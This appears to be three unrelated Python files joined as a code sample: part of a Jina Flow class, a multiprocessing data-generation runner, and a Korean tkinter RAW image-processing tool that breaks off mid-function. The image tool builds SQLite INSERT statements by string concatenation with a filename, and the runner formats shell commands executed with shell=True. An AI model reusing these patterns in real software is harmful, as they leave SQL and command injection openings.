]
pod_nodes = []
# plot subgraphs
for node, v in self._pod_nodes.items():
pod_nodes.append(v.name)
mermaid_graph.extend(v._mermaid_str)
for node, v in self._pod_nodes.items():
for need in sorted(v.needs):
need_print = need
if need == 'gateway':
need_print = 'gatewaystart[gateway]'
node_print = node
if node == 'gateway':
node_print = 'gatewayend[gateway]'
_s_role = self._pod_nodes[need].role
_e_role = self._pod_nodes[node].role
if getattr(self._pod_nodes[need].args, 'external', False):
_s_role = 'EXTERNAL'
if getattr(self._pod_nodes[node].args, 'external', False):
_e_role = 'EXTERNAL'
line_st = '-->'
if _s_role == PodRoleType.INSPECT or _e_role == PodRoleType.INSPECT:
line_st = '-.->'
mermaid_graph.append(
f'{need_print}:::{_s_role} {line_st} {node_print}:::{_e_role};'
)
mermaid_graph.append(f'classDef {PodRoleType.INSPECT} stroke:#F29C9F')
mermaid_graph.append(f'classDef {PodRoleType.JOIN_INSPECT} stroke:#F29C9F')
mermaid_graph.append(
f'classDef {PodRoleType.GATEWAY} fill:none,color:#000,stroke:none'
)
mermaid_graph.append(
f'classDef {PodRoleType.INSPECT_AUX_PASS} stroke-dasharray: 2 2'
)
mermaid_graph.append('classDef HEADTAIL fill:#32C8CD1D')
mermaid_graph.append('\nclassDef EXTERNAL fill:#fff,stroke:#32C8CD')
return '\n'.join(mermaid_graph)
def plot(
self,
output: Optional[str] = None,
vertical_layout: bool = False,
inline_display: bool = False,
build: bool = True,
copy_flow: bool = True,
) -> 'Flow':
"""
Visualize the Flow up to the current point
If a file name is provided it will create a jpg image with that name,
otherwise it will display the URL for mermaid.
If called within IPython notebook, it will be rendered inline,
otherwise an image will be created.
Example,
.. highlight:: python
.. code-block:: python
flow = Flow().add(name='pod_a').plot('flow.svg')
:param output: a filename specifying the name of the image to be created,
the suffix svg/jpg determines the file type of the output image
:param vertical_layout: top-down or left-right layout
:param inline_display: show image directly inside the Jupyter Notebook
:param build: build the Flow first before plotting, so the gateway connection can be shown more accurately
:param copy_flow: when set to true, then always copy the current Flow and
do the modification on top of it then return, otherwise, do in-line modification
:return: the Flow
"""
# deepcopy causes the below error while reusing a Flow in Jupyter
# 'Pickling an AuthenticationString object is disallowed for security reasons'
op_flow = copy.deepcopy(self) if copy_flow else self
if build:
op_flow.build(False)
mermaid_str = op_flow._mermaid_str
if vertical_layout:
mermaid_str = mermaid_str.replace('flowchart LR', 'flowchart TD')
image_type = 'svg'
if output and not output.endswith('svg'):
image_type = 'img'
url = op_flow._mermaid_to_url(mermaid_str, image_type)
showed = False
if inline_display:
try:
from IPython.display import display, Image
display(Image(url=url))
showed = True
except:
# no need to panic users
pass
if output:
download_mermaid_url(url, output)
elif not showed:
op_flow.logger.info(f'flow visualization: {url}')
return self
def _ipython_display_(self):
"""Displays the object in IPython as a side effect"""
self.plot(
inline_display=True, build=(self._build_level != FlowBuildLevel.GRAPH)
)
def _mermaid_to_url(self, mermaid_str: str, img_type: str) -> str:
"""
Render the current Flow as a URL pointing to an SVG. It requires an internet connection
:param mermaid_str: the mermaid representation
:param img_type: image type (svg/jpg)
:return: the URL pointing to an SVG
"""
encoded_str = base64.b64encode(bytes(mermaid_str, 'utf-8')).decode('utf-8')
return f'https://mermaid.ink/{img_type}/{encoded_str}'
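# Note (added): the mermaid source is simply base64-encoded and embedded in the
# URL, e.g. https://mermaid.ink/svg/<base64-of-diagram>, so rendering happens
# remotely on mermaid.ink and needs internet access.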
@property
def port_expose(self) -> int:
"""Return the exposed port of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].args.port_expose
else:
return self._common_kwargs.get('port_expose', None)
@port_expose.setter
def port_expose(self, value: int):
"""Set the new exposed port of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['port_expose'] = value
# Flow is already built to graph level
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.port_expose = self._common_kwargs['port_expose']
# Flow is already running, so restart the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def host(self) -> str:
"""Return the local address of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].host
else:
return self._common_kwargs.get('host', __default_host__)
@host.setter
def host(self, value: str):
"""Set the new host of the Flow (affects Gateway and Client)
:param value: the new host
"""
self._common_kwargs['host'] = value
# Flow is already built to graph level
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.host = self._common_kwargs['host']
# Flow is already running, so restart the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def address_private(self) -> str:
"""Return the private IP address of the gateway for connecting from other machine in the same network
.. # noqa: DAR201"""
return get_internal_ip()
@property
def address_public(self) -> str:
"""Return the public IP address of the gateway for connecting from other machine in the public network
.. # noqa: DAR201"""
return get_public_ip()
def __iter__(self):
return self._pod_nodes.items().__iter__()
def _get_address_table(self, address_table):
address_table.extend(
[
f'\t🔗 Protocol: \t\t{colored(self.protocol, attrs="bold")}',
(
'\t🏠 Local access:\t'
+ colored(
f'{self.host}:{self.port_expose}',
'cyan',
attrs='underline',
)
),
(
'\t🔒 Private network:\t'
+ colored(
f'{self.address_private}:{self.port_expose}',
'cyan',
attrs='underline',
)
),
]
)
if self.address_public:
address_table.append(('\t🌐 Public address:\t' + colored(
f'{self.address_public}:{self.port_expose}',
'cyan',
attrs='underline',
)))
if self.protocol == GatewayProtocolType.HTTP:
address_table.append(('\t💬 Swagger UI:\t\t' + colored(
f'http://localhost:{self.port_expose}/docs',
'cyan',
attrs='underline',
)))
address_table.append(('\t📚 Redoc:\t\t' + colored(
f'http://localhost:{self.port_expose}/redoc',
'cyan',
attrs='underline',
)))
return address_table
def block(
self, stop_event: Optional[Union[threading.Event, multiprocessing.Event]] = None
):
"""Block the Flow until `stop_event` is set or user hits KeyboardInterrupt
:param stop_event: a threading event or a multiprocessing event that, once set, will return control
to the main thread.
"""
try:
if stop_event is None:
self._stop_event = (
threading.Event()
) #: this allows `.close` to close the Flow from another thread/proc
self._stop_event.wait()
else:
stop_event.wait()
except KeyboardInterrupt:
pass
@property
def protocol(self) -> GatewayProtocolType:
"""Return the protocol of this Flow
:return: the protocol of this Flow
"""
v = self._common_kwargs.get('protocol', GatewayProtocolType.GRPC)
if isinstance(v, str):
v = GatewayProtocolType.from_string(v)
return v
@protocol.setter
def protocol(self, value: Union[str, GatewayProtocolType]):
"""Set the protocol of this Flow
:param value: the protocol to set
"""
if isinstance(value, str):
self._common_kwargs['protocol'] = GatewayProtocolType.from_string(value)
elif isinstance(value, GatewayProtocolType):
self._common_kwargs['protocol'] = value
else:
raise TypeError(f'{value} must be either `str` or `GatewayProtocolType`')
# Flow is already built to graph level
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.protocol = self._common_kwargs['protocol']
# Flow is already running, so restart the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
def __getitem__(self, item):
if isinstance(item, str):
return self._pod_nodes[item]
elif isinstance(item, int):
return list(self._pod_nodes.values())[item]
else:
raise TypeError(f'{typename(item)} is not supported')
@property
def workspace(self) -> str:
"""Return the workspace path of the flow.
.. # noqa: DAR201"""
return os.path.abspath(self.args.workspace or './')
@workspace.setter
def workspace(self, value: str):
"""set workspace dir for flow & all pods
:param value: workspace to be set
"""
self.args.workspace = value
for k, p in self:
p.args.workspace = value
@property
def workspace_id(self) -> Dict[str, str]:
"""Get all Pods' ``workspace_id`` values in a dict
.. # noqa: DAR201"""
return {
k: p.args.workspace_id for k, p in self if hasattr(p.args, 'workspace_id')
}
@workspace_id.setter
def workspace_id(self, value: str):
"""Set all Pods' ``workspace_id`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
for k, p in self:
if hasattr(p.args, 'workspace_id'):
p.args.workspace_id = value
args = getattr(p, 'peas_args', getattr(p, 'shards_args', None))
if args is None:
raise ValueError(
f'could not find "peas_args" or "shards_args" on {p}'
)
values = None
if isinstance(args, dict):
values = args.values()
elif isinstance(args, list):
values = args
for v in values:
if v and isinstance(v, argparse.Namespace):
v.workspace_id = value
if v and isinstance(v, List):
for i in v:
i.workspace_id = value
@property
def env(self) -> Optional[Dict]:
"""Get all envs to be set in the Flow
:return: envs as dict
"""
return self.args.env
@env.setter
def env(self, value: Dict[str, str]):
"""set env vars for flow & all pods.
This can be used by jinad to set envs for Flow and all child objects
:param value: value to be set
"""
self.args.env = value
for k, v in self:
v.args.env = value
@property
def identity(self) -> Dict[str, str]:
"""Get all Pods' ``identity`` values in a dict
.. # noqa: DAR201
"""
return {k: p.args.identity for k, p in self}
@identity.setter
def identity(self, value: str):
"""Set all Pods' ``identity`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
# Re-initiating logger with new identity
self.logger = JinaLogger(self.__class__.__name__, **vars(self.args))
for _, p in self:
p.args.identity = value
@overload
def expose_endpoint(self, exec_endpoint: str, path: Optional[str] = None):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
:param path: the HTTP endpoint string, when not given, it is `exec_endpoint`
"""
...
@overload
def expose_endpoint(
self,
exec_endpoint: str,
*,
path: Optional[str] = None,
status_code: int = 200,
tags: Optional[List[str]] = None,
summary: Optional[str] = None,
description: Optional[str] = None,
response_description: str = 'Successful Response',
deprecated: Optional[bool] = None,
methods: Optional[List[str]] = None,
operation_id: Optional[str] = None,
response_model_by_alias: bool = True,
response_model_exclude_unset: bool = False,
response_model_exclude_defaults: bool = False,
response_model_exclude_none: bool = False,
include_in_schema: bool = True,
name: Optional[str] = None,
):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
Use this method to specify your HTTP endpoint with richer semantic and schema.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
"""
...
def expose_endpoint(self, exec_endpoint: str, **kwargs):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
# noqa: DAR102
"""
self._endpoints_mapping[exec_endpoint] = kwargs
# for backward support
join = needs
def rolling_update(
self,
pod_name: str,
dump_path: Optional[str] = None,
*,
uses_with: Optional[Dict] = None,
):
"""
Reload all replicas of a pod sequentially
:param pod_name: pod to update
:param dump_path: **backwards compatibility** the dump path to reload from; this used to be the only argument the function accepted
:param uses_with: a Dictionary of arguments to restart the executor with
"""
from ..helper import run_async
run_async(
self._pod_nodes[pod_name].rolling_update,
dump_path=dump_path,
uses_with=uses_with,
any_event_loop=True,
)
@property
def client_args(self) -> argparse.Namespace:
"""Get Client settings.
# noqa: DAR201
"""
if 'port_expose' in self._common_kwargs:
kwargs = copy.deepcopy(self._common_kwargs)
kwargs['port'] = self._common_kwargs['port_expose']
return ArgNamespace.kwargs2namespace(kwargs, set_client_cli_parser())
@property
def gateway_args(self) -> argparse.Namespace:
"""Get Gateway settings.
# noqa: DAR201
"""
return ArgNamespace.kwargs2namespace(self._common_kwargs, set_gateway_parser())
def update_network_interface(self, **kwargs):
"""Update the network interface of this Flow (affects Gateway & Client)
:param kwargs: new network settings
"""
self._common_kwargs.update(kwargs)
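# --------------------------------------------------------------------------
# Added usage sketch (not part of the original source): a minimal example of
# driving the Flow class defined above. The Pod name 'pod_a' and the output
# file 'flow.svg' are illustrative placeholders.
if __name__ == '__main__':
    f = Flow().add(name='pod_a').inspect()  # one worker Pod plus an inspection Pod
    f.plot('flow.svg')                      # render the topology via mermaid.ink
    with f:                                 # builds and starts the Flow, closes it on exit
        print(f'gateway listening on {f.host}:{f.port_expose}')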
|
datagen.py
|
"""
Batch-generate data
"""
import os
import numpy as np
import multiprocessing as mp
from subprocess import call
from utils import printout
import time
class DataGen(object):
def __init__(self, num_processes, flog=None):
self.num_processes = num_processes
self.flog = flog
self.todos = []
self.processes = []
self.is_running = False
self.Q = mp.Queue()
def __len__(self):
return len(self.todos)
def add_one_collect_job(self, data_dir, shape_id, category, cnt_id, primact_type, trial_id):
if self.is_running:
printout(self.flog, 'ERROR: cannot add a new job while DataGen is running!')
exit(1)
todo = ('COLLECT', shape_id, category, cnt_id, primact_type, data_dir, trial_id, np.random.randint(10000000))
self.todos.append(todo)
def add_one_recollect_job(self, src_data_dir, dir1, dir2, recollect_record_name, tar_data_dir, x, y):
if self.is_running:
printout(self.flog, 'ERROR: cannot add a new job while DataGen is running!')
exit(1)
todo = ('RECOLLECT', src_data_dir, recollect_record_name, tar_data_dir, np.random.randint(10000000), x, y, dir1, dir2)
self.todos.append(todo)
def add_one_checkcollect_job(self, src_data_dir, dir1, dir2, recollect_record_name, tar_data_dir, x, y):
if self.is_running:
printout(self.flog, 'ERROR: cannot add a new job while DataGen is running!')
exit(1)
todo = ('CHECKCOLLECT', src_data_dir, recollect_record_name, tar_data_dir, np.random.randint(10000000), x, y, dir1, dir2)
self.todos.append(todo)
@staticmethod
def job_func(pid, todos, Q):
succ_todos = []
for todo in todos:
if todo[0] == 'COLLECT':
# cmd = 'python collect_data.py %s %s %d %s --out_dir %s --trial_id %d --random_seed %d --no_gui > /dev/null 2>&1' \
# % (todo[1], todo[2], todo[3], todo[4], todo[5], todo[6], todo[7])
cmd = 'CUDA_VISIBLE_DEVICES=1 python collect_data.py %s %s %d %s --out_dir %s --trial_id %d --random_seed %d --no_gui' \
% (todo[1], todo[2], todo[3], todo[4], todo[5], todo[6], todo[7])
folder_name = todo[5]
job_name = '%s_%s_%d_%s_%s' % (todo[1], todo[2], todo[3], todo[4], todo[6])
elif todo[0] == 'RECOLLECT':
cmd = 'python recollect_data.py %s %s %s --random_seed %d --no_gui --x %d --y %d --dir1 %s --dir2 %s > /dev/null 2>&1' \
% (todo[1], todo[2], todo[3], todo[4], todo[5], todo[6], todo[7], todo[8])
folder_name = todo[3]
job_name = todo[2]
elif todo[0] == 'CHECKCOLLECT':
cmd = 'python checkcollect_data.py %s %s %s --random_seed %d --no_gui --x %d --y %d --dir1 %s --dir2 %s > /dev/null 2>&1' \
% (todo[1], todo[2], todo[3], todo[4], todo[5], todo[6], todo[7], todo[8])
folder_name = todo[3]
job_name = todo[2]
ret = call(cmd, shell=True)
if ret == 0:
succ_todos.append(os.path.join(folder_name, job_name))
if ret == 2:
succ_todos.append(None)
Q.put(succ_todos)
def start_all(self):
if self.is_running:
printout(self.flog, 'ERROR: cannot start all while DataGen is running!')
exit(1)
total_todos = len(self)
num_todos_per_process = int(np.ceil(total_todos / self.num_processes))
np.random.shuffle(self.todos)
for i in range(self.num_processes):
todos = self.todos[i*num_todos_per_process: min(total_todos, (i+1)*num_todos_per_process)]
p = mp.Process(target=self.job_func, args=(i, todos, self.Q))
p.start()
self.processes.append(p)
self.is_running = True
def join_all(self):
if not self.is_running:
printout(self.flog, 'ERROR: cannot join all while DataGen is idle!')
exit(1)
ret = []
for p in self.processes:
ret += self.Q.get()
for p in self.processes:
p.join()
self.todos = []
self.processes = []
self.Q = mp.Queue()
self.is_running=False
return ret
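# --------------------------------------------------------------------------
# Added usage sketch (not part of the original source): how DataGen is driven.
# The shape id, category, primact type and directory below are placeholders,
# and collect_data.py is assumed to be available next to this script.
if __name__ == '__main__':
    gen = DataGen(num_processes=4)
    gen.add_one_collect_job('./results', '40147', 'StorageFurniture', 0, 'pushing', 0)
    gen.start_all()                # spawn worker processes over the queued jobs
    succ = gen.join_all()          # blocks until all workers finish
    print('%d job(s) reported success' % len([s for s in succ if s is not None]))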
|
Project3 Image Processing Raw.py
|
#Project
## Image processing and data analysis tool
from tkinter import *; import os.path ;import math
from tkinter.filedialog import *
from tkinter.simpledialog import *
import operator
import threading
import random
## Function definitions
def loadImage(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = os.path.getsize(fname) # check the file size
inH = inW = int(math.sqrt(fsize)) # determine the input memory size (important: assumes a square image)
inImage = []; tmpList = []
for i in range(inH) : # allocate input memory (initialized to 0)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# load the data from the file into memory
fp = open(fname, 'rb') # open the file in binary mode
for i in range(inH) :
for k in range(inW) :
inImage[i][k] = int(ord(fp.read(1)))
fp.close()
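# Note (added): loadImage assumes a headerless, square, 8-bit grayscale RAW file,
# so the side length is the square root of the file size; e.g. a 65,536-byte file
# is treated as a 256x256 image (256 = int(math.sqrt(65536))).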
def openFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
loadImage(filename) # file --> input memory
equal() # input memory --> output memory
import threading
def display() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# if a canvas already exists, tear it down first
if canvas != None :
canvas.destroy()
# prepare the view (fixed size)
VIEW_X, VIEW_Y = 256, 256
if VIEW_X >= outW or VIEW_Y >= outH : # if the image is no larger than the view
VIEW_X = outW
VIEW_Y = outH
step = 1 # number of pixels to skip
else :
step = outW / VIEW_X # step may be fractional, to handle sizes other than 128/256/512
window.geometry(str(VIEW_X*2) + 'x' + str(VIEW_Y*2))
canvas = Canvas(window, width=VIEW_X, height=VIEW_Y)
paper = PhotoImage(width=VIEW_X, height=VIEW_Y)
canvas.create_image((VIEW_X/2, VIEW_X/2), image=paper, state='normal')
# draw to the screen; numpy is used so that the step can be fractional
import numpy
def putPixel() :
for i in numpy.arange(0, outH,step) :
for k in numpy.arange(0, outW,step) :
i = int(i); k = int(k) # cast to int since they are used as indices
data = outImage[i][k]
paper.put('#%02x%02x%02x' % (data, data, data),
( int(k/step),int(i/step)))
threading.Thread(target=putPixel).start()
canvas.pack(expand=1, anchor =CENTER)
status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH) )
def equal() : # identity (copy) algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output memory size
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # allocate output memory (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
for i in range(inH) :
for k in range(inW) :
outImage[i][k] = inImage[i][k]
display()
#[point-processing algorithms]
def addImage(num) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output memory size
outW = inW
outH = inH
outImage = []
tmpList = []
for i in range(outH): # allocate output memory (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
if num == 1: # brighten (addition)
value = askinteger('밝게하기', '밝게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH) :
for k in range(inW) :
if inImage[i][k] + value > 255 : # addition
outImage[i][k] = 255
else :
outImage[i][k] = inImage[i][k] + value
elif num == 2: # darken (subtraction)
value = askinteger('어둡게하기', '어둡게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH):
for k in range(inW):
if inImage[i][k] - value < 0: # subtraction
outImage[i][k] = 0
else:
outImage[i][k] = inImage[i][k] - value
elif num == 3: # brighten (multiplication) = increase contrast
value = askinteger('밝게하기(뚜렷하게)', '밝게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH):
for k in range(inW):
if inImage[i][k] * value > 255: # multiplication
outImage[i][k] = 255
else:
outImage[i][k] = inImage[i][k] * value
elif num == 4: # darken (division) = fade
value = askinteger('어둡게하기(희미하게)', '어둡게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH):
for k in range(inW):
if inImage[i][k] // value > 255: # division: {careful} floor division keeps only the quotient, otherwise it errors
outImage[i][k] = 255
elif inImage[i][k] // value < 0:
outImage[i][k] = 0
else:
outImage[i][k] = inImage[i][k] // value
display()
#[data analysis]
def analyzeData(num) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
if num == 1 : # average value of the input and output images
rawSum = 0
for i in range(inH) :
for k in range(inW) :
rawSum += inImage[i][k]
inRawAvg = int(rawSum / (inH*inW))
rawSum = 0
for i in range(outH) :
for k in range(outW) :
rawSum += outImage[i][k]
outRawAvg = int(rawSum / (outH*outW))
subWindow = Toplevel(window) # sub-window owned by the parent (window)
subWindow.geometry('400x400')
label1 = Label(subWindow, text='입력영상 평균값 -->' + str(inRawAvg))
label1.pack()
label2 = Label(subWindow, text='출력영상 평균값 -->' + str(outRawAvg))
label2.pack()
elif num == 2 : # most / least frequent values of the input and output (by pixel count)
inDict, outDict = {}, {}
for i in range(inH): # {important}{review later} build frequency dictionaries
for k in range(inW):
if inImage[i][k] in inDict:
inDict[inImage[i][k]] += 1
else:
inDict[inImage[i][k]] = 1
if outImage[i][k] in outDict:
outDict[outImage[i][k]] += 1
else:
outDict[outImage[i][k]] = 1
insortList = sorted(inDict.items(), key=operator.itemgetter(1))
outsortList = sorted(outDict.items(), key=operator.itemgetter(1))
subWindow = Toplevel(window) # sub-window owned by the parent (window)
subWindow.geometry('400x400')
label1 = Label(subWindow, text="입력 시 최대값, 최소값 : " + str(insortList[-1]) + str(insortList[0]))
label1.pack()
label2 = Label(subWindow, text="출력 시 최대값, 최소값 : " + str(outsortList[-1]) + str(outsortList[0]))
label2.pack()
subWindow.mainloop()
def a_histogram() : # histogram
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
countList = [0] * 256; normalList = [0] * 256
for i in range(outH) :
for k in range(outW) :
value = outImage[i][k]
countList[value] += 1
# normalized value = (count - min) * HIGH / (max - min)
maxVal = max (countList); minVal = min(countList)
for i in range(len(countList)) :
normalList[i] = (countList[i] - minVal) * 256 / (maxVal - minVal)
# draw to the screen
subWindow = Toplevel(window)
subWindow.geometry('256x256')
subCanvas = Canvas(subWindow, width=256, height=256)
subPaper = PhotoImage(width=256, height=256)
subCanvas.create_image((256/2,256/2), image=subPaper, state='normal')
for i in range(0, 256) :
for k in range(0, int(normalList[i])) :
data = 0
subPaper.put('#%02x%02x%02x' % (data, data, data), (i, 255-k))
subCanvas.pack(expand=1, anchor=CENTER)
subWindow.mainloop()
import matplotlib.pyplot as plt
def a_histogram2() : # histogram (matplotlib)
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
countList = [0] * 256
for i in range(outH) :
for k in range(outW) :
value = outImage[i][k]
countList[value] += 1
plt.plot(countList)
plt.show()
def upDown() : # vertical flip algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output memory size
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # allocate output memory (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
for i in range(inH) :
for k in range(inW) :
outImage[outH-1-i][k] = inImage[i][k] # flip rows (use outH, not outW, so non-square images also work)
display()
def LRReversalImage(): # horizontal flip algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output memory size
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # allocate output memory (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
for i in range(inH) :
for k in range(inW) :
outImage[i][outW - 1 - k] = inImage[i][k] # {key} horizontal flip (use outW, not outH, so non-square images also work)
display()
def panImage() :
global panYN
panYN = True
def mouseClick(event) : # record the panning start point
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN :
return
sx = event.x; sy = event.y;
def mouseDrop(event): # apply the pan using the drag end point
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN:
return
ex = event.x; ey = event.y;
my = sx - ex ; mx = sy - ey
# important! determine the output memory size
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # allocate output memory (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
for i in range(inH) :
for k in range(inW) :
if 0<= i-mx <outH and 0<= k-my < outW :
outImage[i-mx][k-my] = inImage[i][k]
panYN = False
display()
def zoomOut() : # shrink (zoom out) algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output memory size
scale = askinteger('축소하기', '축소할 배수-->', minvalue=2, maxvalue=32)
outW = int(inW/scale); outH = int(inH/scale);
outImage = []; tmpList = []
for i in range(outH): # allocate output memory (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
for i in range(inH) :
for k in range(inW) :
outImage[int(i/scale)][int(k/scale)] = inImage[i][k]
display()
def zoomInForW() : # zoom in - forward mapping
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# important! determine the output memory size
scale = askinteger('화면확대-전방향', '화면확대(전방향)할 배수-->', minvalue=2, maxvalue=32)
outW = int(inW*scale); outH = int(inH*scale);
outImage = []; tmpList = []
for i in range(outH): # allocate output memory (initialized to 0)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# the actual image-processing algorithm
############################
for i in range(inH) :
for k in range(inW) :
outImage[int(i * scale)][int(k * scale)] = inImage[i][k] # {key} multiply the coordinates
display()
# result comes out wrong {work in progress}
# def zoomInBackW(): # zoom in - backward mapping - nearest-neighbor interpolation
# global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# # important! determine the output memory size
# scale = askinteger('화면확대-역방향', '화면확대(역방향)할 배수-->', minvalue=2, maxvalue=32)
# outW = int(inW*scale); outH = int(inH*scale);
# outImage = []; tmpList = []
# for i in range(outH): # allocate output memory (initialized to 0)
# tmpList = []
# for k in range(outW):
# tmpList.append(0)
# outImage.append(tmpList)
# #############################
# # the actual image-processing algorithm
# ############################
# for i in range(inH) :
# for k in range(inW) :
# outImage[int(i)][int(k)] = inImage[int(i/scale)][int(k/scale)] # {key} backward mapping
# display()
import struct
def saveFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
saveFp = asksaveasfile(parent=window, mode='wb',
defaultextension="*.raw", filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
for i in range(outW):
for k in range(outH):
saveFp.write( struct.pack('B',outImage[i][k]))
saveFp.close()
def exitFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
pass
import csv
def saveCSV() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.csv", filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
output_file = output_file.name
header = ['Column', 'Row', 'Value']
with open(output_file, 'w', newline='') as filewriter:
csvWriter = csv.writer(filewriter)
csvWriter.writerow(header)
for row in range(outW):
for col in range(outH):
data = outImage[row][col]
row_list = [row, col, data]
csvWriter.writerow(row_list)
print('OK!')
def saveShuffleCSV() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='wb',
defaultextension="*.csv", filetypes=(("csv파일", "*.csv"), ("모든파일", "*.*")))
output_file = output_file.name
header = ['Column', 'Row', 'Value']
rowFileList = []
with open(output_file, 'w', newline='') as filewriter:
csvWriter = csv.writer(filewriter)
csvWriter.writerow(header)
for row in range(outW):
for col in range(outW):
data = outImage[row][col]
row_list = [col, row, data] # (row, col) is stored as (col, row)
rowFileList.append(row_list) #
random.shuffle(rowFileList)
for row_list in rowFileList:
csvWriter.writerow(row_list)
def loadCSV(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = -1
fp = open(fname, 'r')
for f in fp :
fsize += 1
fp.close()
inH = inW = int(math.sqrt(fsize)) # determine the input memory size (important)
inImage = []; tmpList = []
for i in range(inH) : # allocate input memory (initialized to 0)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# load the data from the file into memory
fp = open(fname, 'r') # open the file (text mode)
csvFP = csv.reader(fp)
next(csvFP)
for row_list in csvFP :
row= int(row_list[0]) ; col = int(row_list[1]) ; value=int(row_list[2])
inImage[row][col] = value
fp.close()
def openCSV() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
loadCSV(filename) # file --> input memory
equal() # input memory --> output memory
import sqlite3
def saveSQLite() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = sqlite3.connect('imageDB') # open (or create) the database
cur = con.cursor() # create a cursor (the channel through which queries are executed)
# build a list of column names
colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + \
", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
for i in range(inW) :
for k in range(inH) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(inW) + \
"," + str(i) + "," + str(k) + "," + str(inImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # close the database connection
print('Ok! saveSQLite')
def openSQLite() : # table-name list entries look like ['puppy:128', 'puppy:512', ...]
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
